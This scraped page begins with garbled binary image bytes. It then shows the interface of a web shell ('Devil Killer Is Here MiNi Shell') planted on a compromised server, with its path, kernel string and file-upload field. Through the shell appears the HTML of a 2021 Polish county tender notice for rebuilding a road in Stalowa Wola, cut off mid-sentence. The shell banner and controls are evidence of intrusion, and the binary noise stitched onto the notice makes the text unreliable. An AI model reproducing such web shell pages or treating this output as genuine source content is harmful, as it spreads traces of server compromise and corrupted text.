JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211125/0028337901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi powiatowej nr 1024R ul. Czarnieckiego IV </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Stalowowolski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830409181</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Podleśna 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stalowa Wola</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-450</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">powiat@stalowowolski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.stalowowolski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi powiatowej nr 1024R ul. Czarnieckiego IV </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4af232ef-4dc7-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00283379</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000275/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Przebudowa drogi powiatowej Nr 1024R ul. Czarnieckiego w Stalowej Woli</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> bip.stalowowolski.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem:<br/>https://miniportal.uzp.gov.pl/, ePUAP dostępnej pod adresem: https://epuap.gov.pl/wps/portal oraz<br/>poczty elektronicznej: mienie@stalowowolski.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Przez<br/>środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie<br/>z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>2. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe,<br/>pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci<br/>elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf,<br/>.doc, .docx, .odt. Zamawiający zaleca format .pdf. Ofertę, a także oświadczenie o jakim mowa w<br/>Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>3. Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który<br/>dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAP dostępnej pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: mienie@stalowowolski.pl<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,<br/>zobowiązany jest posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do<br/>„Formularza do komunikacji”.<br/>5. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej (ePUAP).<br/>6. Zgodnie z art. 67 ustawy Pzp, Zamawiający podaje wymagania techniczne związane z korzystaniem<br/>z Platformy:<br/>W celu korzystania z systemu miniPortal konieczne jest dysponowanie przez użytkownika<br/>urządzeniem teleinformatycznym z dostępem do sieci Internet. Aplikacja działa na Platformie Windows,<br/>Mac i Linux. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania<br/>czasu odbioru danych:<br/> specyfikacja połączenia - Formularze udostępnione są za pomocą protokołu TLS 1.2, format danych<br/>oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem<br/>UTF-8,<br/> oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i dane<br/>zapisywane są z dokładnością co do setnej części sekundy,<br/> integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP.<br/>W przypadku Wykonawcy wysyłającego wniosek do Zamawiającego, ESP Zamawiającego<br/>automatycznie generuje Rodzaj Urzędowego Poświadczenia Odbioru czyli Urzędowe Poświadczenie<br/>Przedłożenia (UPP), które jest powiązane z wysyłanym dokumentem. W UPP w sekcji „Dane<br/>poświadczenia” jest zawarta informacja o dacie doręczenia.<br/>System dostępny jest za pośrednictwem następujących przeglądarek internetowych:<br/> Microsoft Internet Explorer od wersji 11.0<br/> Mozilla Firefox od wersji 15<br/> Google Chrome od wersji 20<br/> Microsoft Edge<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>8. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>9. Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej<br/>SWZ – załącznik nr 9 do SWZ. Dane postępowania można wyszukać również na liście wszystkich<br/>postępowań lub na stronie głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej &#34;RODO&#34;) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Powiat Stalowowolski, ul. Podleśna 15, 37-450<br/>Stalowa Wola, tel.: 15 643 37 09, fax: 15 643 36 02, e - mail: powiat@stalowowolski.pl;<br/>2) inspektorem ochrony danych osobowych w Starostwie Powiatowym w Stalowej Woli, ul. Podleśna<br/>15, 37-450 Stalowa Wola jest Pani Magdalena Sołtys-Kurek, tel.: 15 643 36 35, e-mail:<br/>abi@stalowowolski.pl;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b,c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. „Przebudowa<br/>drogi powiatowej nr 1024R ul. Czarnieckiego w Stalowej Woli IV”<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy Pzp oraz podmioty którym powierzono<br/>przetwarzanie danych osobowych na podstawie umowy;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO;<br/>8) posiada Pani/Pan:a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może<br/>naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>Pozostałe informacje dotyczące RODO znajdują się w pkt. Informacje dodatkowe</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IMP.272.2.15.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest przebudowa drogi powiatowej Nr 1024R ul. Czarnieckiego w<br/>Stalowej Woli na odcinku o długości 320 m tj. od km 2+609,08 do km 2+929,08. W ramach<br/>inwestycji należy wzmocnić konstrukcję nawierzchni drogi, wymienić na nowe urządzenia<br/>dylatacyjne w jezdni i chodnikach oraz naprawić miejscowe uszkodzenie dźwigara na obiekcie<br/>mostowym .<br/>Zakres prac obejmuje wykonanie:<br/>- roboty przygotowawcze,<br/>- wprowadzenie tymczasowej organizacji ruchu,<br/>- frezowanie nawierzchni jezdni,<br/>- ułożenie geokompozytowej siatki wzmacniającej ,<br/>- ułożenie warstwy wiążącej i ścieralnej,<br/>- remont urządzeń dylatacyjnych (w jezdni i chodnikach), tj. demontaż istniejących i odtworzenie<br/>( montaż nowych) urządzeń, - remont(naprawa) miejscowego uszkodzenia dźwigara skrajnego na obiekcie mostowym,<br/>- odtworzenie elementów istniejącej organizacji ruchu.<br/>2. Szczegółowy zakres prac niezbędnych do wykonania został opisany w dokumentacji<br/>projektowej, przedmiarze robót oraz szczegółowych specyfikacjach technicznych wykonania i<br/>odbioru robót budowlanych stanowiących załączniki do SWZ.<br/>3. Zakres rzeczowy przedsięwzięcia obejmuje również wszystkie czynności i koszty wynikające z<br/>dokumentacji projektowej, przedmiaru robót, specyfikacji technicznych wykonania i odbioru robót<br/>budowlanych, sztuki budowlanej, uzyskanie dopuszczenia do eksploatacji zainstalowanych<br/>urządzeń, koszt prac geodezyjnych, oraz koszty związane z urządzeniem, utrzymaniem i<br/>zabezpieczeniem terenu budowy, koszty związane z wykonaniem projektu oznakowania i<br/>organizacji ruchu na czas prowadzenia robót wraz z uzgodnieniem, zakupem, ustawieniem i<br/>utrzymaniem oznakowania<br/>Wykonawca podczas realizacji zamówienia zapewni stałą przejezdność przez przebudowywaną<br/>drogę. Zamawiający nie przewiduje możliwości całkowitego zamknięcia drogi.<br/>Wykonawca podczas wykonywania zamówienia zapewni nieprzerwane funkcjonowanie sieci<br/>uzbrojenia podziemnego.<br/>4. Materiały uzyskane w z rozbiórek:<br/>1) materiały z frezowania nawierzchni do wywiezienia i zutylizowania przez Wykonawcę.<br/>2) inne materiały uzyskane w trakcie robót przedstawiające wartość użytkową lub materialną<br/>zostaną dostarczone w miejsce wskazane przez Zamawiającego na odległość do 5 km<br/>5. Zadanie będzie realizowane zgodnie z harmonogramem robót opracowanym przez<br/>Wykonawcę wyłonionego w przetargu. Harmonogram będzie wymagał uzgodnienia z<br/>inspektorem nadzoru i zatwierdzenia przez Zamawiającego.<br/>6. Wspólny Słownik Zamówień CPV – nazwy i kody CPV robót wiodących.<br/>45233120-6 Roboty w zakresie budowy dróg<br/>45223500-1 Konstrukcje z betonu zbrojonego<br/>45223200-8 Roboty konstrukcyjne<br/>7. Zamówienie nie jest podzielone na części. Zamawiający nie dopuszcza możliwości składania<br/>ofert częściowych.<br/>8. Zamawiający nie dopuszcza składania ofert wariantowych oraz w postaci katalogów<br/>elektronicznych.<br/>9. Zamówienia polegające na powtórzeniu podobnych usług lub robót budowlanych i<br/>powierzeniu ich dotychczasowemu Wykonawcy (tryb z wolnej ręki).<br/>9.1. Zamawiający przewiduje możliwość udzielenia zamówień o których mowa w art. 214 ust. 1<br/>pkt 7, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu<br/>Wykonawcy, zamówienia polegającego na powtórzeniu podobnych usług lub robót budowlanych<br/>do 20 % wartości zamówienia podstawowego.<br/>9.2. Zamówienie, o którym mowa w pkt. 9.1 zostało przewidziane w ogłoszeniu o zamówieniu<br/>dla zamówienia podstawowego, jest zgodne z jego przedmiotem oraz całkowita wartość tego<br/>zamówienia została uwzględniona przy obliczaniu jego wartości.<br/>9.3. Zamawiający udzieli zamówień polegających na powtórzeniu podobnych robót<br/>budowlanych, zgodnych z przedmiotem zamówienia podstawowego, m.in. w zakresie<br/> robót drogowych.<br/>9.4. Zamówienie, o którym mowa w ust. 9.1. będzie realizowane w oparciu o warunki umowy<br/>podstawowej.<br/>9.5. Zamawiający udzieli zamówień, o których mowa w art. 305 pkt 1 ustawy Pzp, pod<br/>warunkiem, że dotychczasowy Wykonawca (Wykonawca realizujący warunki umowy<br/>podstawowej):<br/>a) realizował roboty budowlane w terminie i z najwyższą starannością,<br/>b) zapewni nie gorszy standard wykonywania nowego zamówienia niż podstawowego,<br/>c) zaakceptuje istotne warunki dotychczasowej umowy,<br/>d) strony w wyniku negocjacji uzgodnią wynagrodzenie oraz termin wykonania takiego<br/>zamówienia.<br/>10. Równoważność materiałów i urządzeń.10.1. W przypadku gdy Zamawiający dokonał opisu<br/>przedmiotu zamówienia przez wskazanie<br/>znaków towarowych, patentów lub pochodzenia, to należy rozumieć, że dopuszcza się<br/>zastosowanie rozwiązań równoważnych.<br/>10.2. Zamawiający dopuszcza zastosowanie równoważnych materiałów budowlanych do<br/>materiałów wymienionych w dokumentacji projektowej, przedmiarach robót i szczegółowych<br/>specyfikacjach technicznych pod warunkiem, że materiały równoważne będą posiadały co<br/>najmniej takie same parametry techniczne jak materiały wymienione w w/w dokumentach.<br/>10.3. Na Wykonawcy spoczywa obowiązek wykazania, że zaoferowane dostawy - materiały i<br/>urządzenia, usługi lub roboty budowlane spełniają wymagania Zamawiającego.<br/>10.4. Wszelkie materiały i urządzenia (produkty) pochodzące od konkretnych producentów<br/>określają minimalne parametry jakościowe i cechy użytkowe jakim muszą one odpowiadać aby<br/>spełniać wymagania stawiane przez Zamawiającego i stanowią jedynie wzór jakościowy<br/>przedmiotu zamówienia.<br/>10.5. Przez minimalne wymagania parametrów jakościowych Zamawiający rozumie wymagania<br/>dotyczące produktów określone w ogólnie dostępnych źródłach tj. katalogach, publikacjach,<br/>stronach internetowych producentów. Wprowadzenie przykładowych nazw producenta ma na<br/>celu jedynie doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego<br/>rozwiązania. Zamawiający przy opisie przedmiotu zamówienia wskazując oznaczenie<br/>konkretnego producenta-dostawcy lub wskazując konkretny produkt, dopuszcza jednocześnie<br/>produkty równoważne o parametrach jakościowych i cechach użytkowych, co najmniej na<br/>poziomie parametrów skazanego produktu, uznając tym samym każdy produkt o wskazanych<br/>parametrach lub lepszych. W takiej sytuacji Zamawiający wymaga złożenia stosownych<br/>dokumentów , uwiarygodniających te produkty.<br/>W przypadku, gdy Wykonawca nie złoży w ofercie dokumentów dotyczących zastosowania<br/>innych produktów, to uznaje się, że do kalkulacji ceny przyjęto produkty zaproponowane w<br/>dokumentacji projektowej. Przez parametry rozumie się funkcjonalność, przeznaczenie,<br/>kolorystykę, strukturę, materiały, kształt, wielkość wytrzymałość, bezpieczeństwo. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45223200-8 - Roboty konstrukcyjne</p> <p class="mb-0">45223500-1 - Konstrukcje z betonu zbrojonego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. Zamówienia polegające na powtórzeniu podobnych usług lub robót budowlanych i<br/>powierzeniu ich dotychczasowemu Wykonawcy (tryb z wolnej ręki).<br/>1.1. Zamawiający przewiduje możliwość udzielenia zamówień o których mowa w art. 214 ust. 1 pkt 7, w<br/>okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy,<br/>zamówienia polegającego na powtórzeniu podobnych usług lub robót budowlanych do 20 % wartości<br/>zamówienia podstawowego.<br/>1.2. Zamówienie, o którym mowa w pkt. 9.1 zostało przewidziane w ogłoszeniu o zamówieniu dla<br/>zamówienia podstawowego, jest zgodne z jego przedmiotem oraz całkowita wartość tego zamówienia<br/>została uwzględniona przy obliczaniu jego wartości.<br/>1.3. Zamawiający udzieli zamówień polegających na powtórzeniu podobnych robót budowlanych,<br/>zgodnych z przedmiotem zamówienia podstawowego, m.in. w zakresie<br/>robót drogowych.<br/>1.4. Zamówienie, o którym mowa w ust. 9.1. będzie realizowane w oparciu o warunki umowy<br/>podstawowej.<br/>1.5. Zamawiający udzieli zamówień, o których mowa w art. 305 pkt 1 ustawy Pzp, pod warunkiem, że<br/>dotychczasowy Wykonawca (Wykonawca realizujący warunki umowy podstawowej):<br/>a) realizował roboty budowlane w terminie i z najwyższą starannością,<br/>b) zapewni nie gorszy standard wykonywania nowego zamówienia niż podstawowego,<br/>c) zaakceptuje istotne warunki dotychczasowej umowy,<br/>d) strony w wyniku negocjacji uzgodnią wynagrodzenie oraz termin wykonania takiego zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował<br/>następującymi kryteriami oceny ofert:<br/>1) Cena – waga kryterium 60%;<br/>2) Długość okresu gwarancji i rękojmi za wady – waga kryterium 